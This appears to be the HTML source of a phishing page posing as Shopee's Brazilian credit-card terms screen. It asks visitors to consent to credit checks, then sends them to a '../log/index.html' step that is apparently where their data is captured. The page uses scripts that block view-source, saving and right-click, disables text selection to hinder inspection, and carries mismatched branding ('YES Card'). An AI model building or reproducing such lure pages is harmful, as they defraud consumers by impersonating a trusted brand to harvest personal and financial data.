<!DOCTYPE html><html lang="pt-BR">
<head>
     <!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'../../www.googletagmanager.com/gtm5445.html?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-PZGDSCMH');</script>
<!-- End Google Tag Manager -->
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/icon_favicon_1_32.0Wecxv.png">
    <title>Cartão Shopee - Termos e Condições</title>
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&amp;display=swap" rel="stylesheet">
    <style>
        body {
            font-family: 'Poppins', sans-serif;
            background-color: #f9f9f9;
            color: #333;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }

        .header {
            background-color: #ffffff;
            padding: 20px;
            text-align: center;
            border-bottom: 3px solid #ee4d2d;
        }

        .header img {
            width: 150px;
        }

        .main-content {
            max-width: 500px;
            background: #fff;
            margin: 50px auto;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 4px 15px rgba(0, 0, 0, 0.1);
        }

        .main-content h1 {
            font-size: 1.5rem;
            font-weight: bold;
            color: #444;
            margin-bottom: 5px;
            text-align: center;
        }

        .main-content h2 {
            font-size: 0.95rem;
            font-weight: normal;
            color: gray;
            margin-bottom: 20px;
            text-align: center;
        }

        .info-box {
            display: flex;
            align-items: center;
            border: 1px solid #e6e6e6;
            border-radius: 8px;
            padding: 10px 15px;
            margin-bottom: 15px;
            background-color: #f9f9f9;
        }

        .info-box img {
            width: 24px;
            height: 24px;
            margin-right: 15px;
            filter: brightness(0); /* Torna os ícones pretos */
        }

        .info-box p {
            font-size: 0.9rem;
            color: #444;
            margin: 0;
        }

        .btn-custom {
            background-color: #ee4d2d;
            color: white;
            border: none;
            border-radius: 8px;
            padding: 12px;
            font-weight: bold;
            font-size: 0.95rem;
            text-align: center;
            width: 100%;
            cursor: pointer;
            transition: all 0.3s ease;
        }

        .btn-custom:hover {
            background-color: #000;
        }

    .footer {
        background: #ffffff;
        border-top: 1px solid #e6e6e6;
        text-align: center;
        padding: 15px;
        font-size: 10px;
        color: #666;
    }
    </style>
    <script>
if (document.addEventListener) {
    document.addEventListener("keydown", bloquearSource);
} else { //Versões antigas do IE
    document.attachEvent("onkeydown", bloquearSource);
}

function bloquearSource(e) {
    e = e || window.event;

    var code = e.which || e.keyCode;

    if (
        e.ctrlKey &&
        (code == 83 || code == 85) //83 = S, 85 = U
    ) {
        if (e.preventDefault) {
            e.preventDefault();
        } else {
            e.returnValue = false;
        }

        return false;
    }
}
</script>
<style>
/*desabilita a seleção no body*/
body {
    -webkit-touch-callout: none; /* iOS Safari */
      -webkit-user-select: none; /* Chrome/Safari/Opera */
       -khtml-user-select: none; /* Konqueror */
         -moz-user-select: none; /* Firefox */
          -ms-user-select: none; /* Internet Explorer/Edge */
              user-select: none;
}

/*habilita a seleção nos campos editaveis*/
input, textarea {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: text; /* Chrome/Safari/Opera */
       -khtml-user-select: text; /* Konqueror */
         -moz-user-select: text; /* Firefox */
          -ms-user-select: text; /* Internet Explorer/Edge */
              user-select: text;
}

/*habilita a seleção nos campos com o atributo contenteditable*/
[contenteditable=true] {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: all; /* Chrome/Safari/Opera */
       -khtml-user-select: all; /* Konqueror */
         -moz-user-select: all; /* Firefox */
          -ms-user-select: all; /* Internet Explorer/Edge */
              user-select: all;
}
</style>

<script>
if (document.addEventListener) {
    document.addEventListener("contextmenu", function(e) {
        e.preventDefault();
        return false;
    });
} else { //Versões antigas do IE
    document.attachEvent("oncontextmenu", function(e) {
        e = e || window.event;
        e.returnValue = false;
        return false;
    });
}
</script>
</head>
<body>
    
    <!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'../../www.googletagmanager.com/gtm5445.html?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-PZGDSCMH');</script>
<!-- End Google Tag Manager -->
    
    <!-- Header -->
    <div class="header">
        <img src="images/shopee-logo.png" alt="YES Card">
    </div>

    <!-- Main Content -->
    <div class="main-content">
        <h1>Conta digital e cartão de crédito</h1>
        <h2>Tudo o que você precisa em um só lugar</h2>

        <div class="info-box">
            <img src="images/shield.png" alt="Ícone de aprovação">
            <p>Crédito sujeito à análise e aprovação.</p>
        </div>

        <div class="info-box">
            <img src="images/data-configuration.png" alt="Ícone de dados">
            <p>Os dados fornecidos por você a seguir serão utilizados para o processo de aquisição do cartão de crédito.</p>
        </div>

        <div class="info-box">
            <img src="images/bank-building.png" alt="Ícone de banco">
            <p>Autorizo a consulta ao SCR - Sistema de Crédito do Banco Central e aos cadastros e órgãos de proteção ao crédito.</p>
        </div>

        <button class="btn-custom" onclick="location.href='../log/index.html'">Li e concordo</button>
    </div>

    <!-- Footer -->
    <div class="footer">
Copyright 2025 Shopee. Todos os direitos reservados.<br>

Política de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa do Site
    </div>
</body>
</html>